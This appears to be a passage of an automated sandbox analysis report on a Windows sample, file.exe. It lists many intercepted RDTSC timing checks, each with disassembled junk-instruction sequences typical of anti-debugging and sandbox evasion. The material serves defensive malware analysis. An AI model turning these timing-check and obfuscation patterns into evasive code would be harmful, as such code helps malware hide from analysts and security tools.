Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4088 second address: FF40CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007FD8346DB1F6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007FD8346DB208h 0x00000014 pushad 0x00000015 jmp 00007FD8346DB208h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9EB6 second address: FF9EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF885C second address: FF886E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FD8346DB1F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8B81 second address: FF8B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8E29 second address: FF8E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8E2D second address: FF8E33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8E33 second address: FF8E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8E3B second address: FF8E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8E3F second address: FF8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DB1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8FF0 second address: FF9001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD8346DCB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9001 second address: FF903D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB209h 0x00000009 popad 0x0000000a jmp 00007FD8346DB202h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jnc 00007FD8346DB1F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF903D second address: FF904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD8346DCB26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF904C second address: FF905B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF905B second address: FF9063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF942B second address: FF942F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF942F second address: FF9452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD8346DCB37h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9452 second address: FF9456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9456 second address: FF9484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB2Ch 0x0000000d jmp 00007FD8346DCB32h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD8346DCB26h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF974D second address: FF9769 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9769 second address: FF976E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9C99 second address: FF9C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9C9F second address: FF9CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9CBB second address: FF9CDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB209h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9CDC second address: FF9CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB99D second address: FFB9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEBB8 second address: FFEBD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB30h 0x00000007 je 00007FD8346DCB32h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEBD2 second address: FFEBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10016E5 second address: 10016EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10016EF second address: 10016F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10016F5 second address: 10016F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10016F9 second address: 10016FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10016FD second address: 1001711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DCB2Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1001711 second address: 1001717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1001717 second address: 100172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD8346DCB2Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003828 second address: 100382D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100382D second address: 1003841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DCB2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006364 second address: 1006383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD8346DB1FAh 0x0000000a jl 00007FD8346DB1FCh 0x00000010 jp 00007FD8346DB1F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006383 second address: 1006387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B385 second address: 100B39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD8346DB1FBh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B39B second address: 100B39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A7F8 second address: 100A810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DB1FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A810 second address: 100A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A81B second address: 100A825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD8346DB1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A998 second address: 100A99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A99E second address: 100A9BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB208h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A9BA second address: 100A9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD8346DCB26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A9C8 second address: 100A9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A9DC second address: 100A9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB37h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A9FE second address: 100AA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100AB3D second address: 100AB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100AB46 second address: 100AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10104AE second address: 10104B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10104B2 second address: 10104CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FD8346DB1F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10104CF second address: 1010511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD8346DCB30h 0x0000000c pushad 0x0000000d jmp 00007FD8346DCB34h 0x00000012 jmp 00007FD8346DCB2Fh 0x00000017 jnc 00007FD8346DCB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1010511 second address: 101051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10107D3 second address: 10107F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB2Ch 0x00000009 popad 0x0000000a jmp 00007FD8346DCB31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014501 second address: 1014505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014505 second address: 101450E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101450E second address: 101451D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FD8346DB1F6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013C7B second address: 1013C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013C7F second address: 1013C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013C8A second address: 1013CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DCB26h 0x0000000a jmp 00007FD8346DCB2Fh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013CA7 second address: 1013CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013CAD second address: 1013CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013CB5 second address: 1013CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 js 00007FD8346DB1F6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013DD8 second address: 1013DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD8346DCB2Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013F62 second address: 1013F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013F68 second address: 1013F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD8346DCB2Ah 0x0000000c jo 00007FD8346DCB26h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013F82 second address: 1013F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD8346DB1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C2DC second address: 101C2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C2EE second address: 101C2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C2F4 second address: 101C2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C2FA second address: 101C306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD8346DB1F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C306 second address: 101C30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A369 second address: 101A380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A4A8 second address: 101A4DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD8346DCB31h 0x0000000c jmp 00007FD8346DCB2Bh 0x00000011 jmp 00007FD8346DCB2Eh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A4DD second address: 101A4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FD8346DB1F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A63C second address: 101A642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A642 second address: 101A654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101AF75 second address: 101AF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101AF7B second address: 101AF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B206 second address: 101B20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B20A second address: 101B20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B20E second address: 101B217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101BFF1 second address: 101BFF7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101BFF7 second address: 101C005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD8346DCB26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F266 second address: 101F2B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FD8346DB1F8h 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD8346DB206h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FD8346DB200h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F2B0 second address: 101F2B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F2B6 second address: 101F2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FD8346DB200h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F687 second address: 101F69C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jo 00007FD8346DCB5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F69C second address: 101F6AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F6AA second address: 101F6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F6AE second address: 101F6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FC23 second address: 101FC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DCB2Ah 0x00000009 jmp 00007FD8346DCB38h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FC49 second address: 101FC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FDAC second address: 101FDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FDB0 second address: 101FDB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FDB6 second address: 101FDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB37h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD8346DCB30h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FDE7 second address: 101FE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB204h 0x00000007 jl 00007FD8346DB1F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jng 00007FD8346DB1F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10247C7 second address: 10247E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10247E4 second address: 10247F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD8346DB200h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
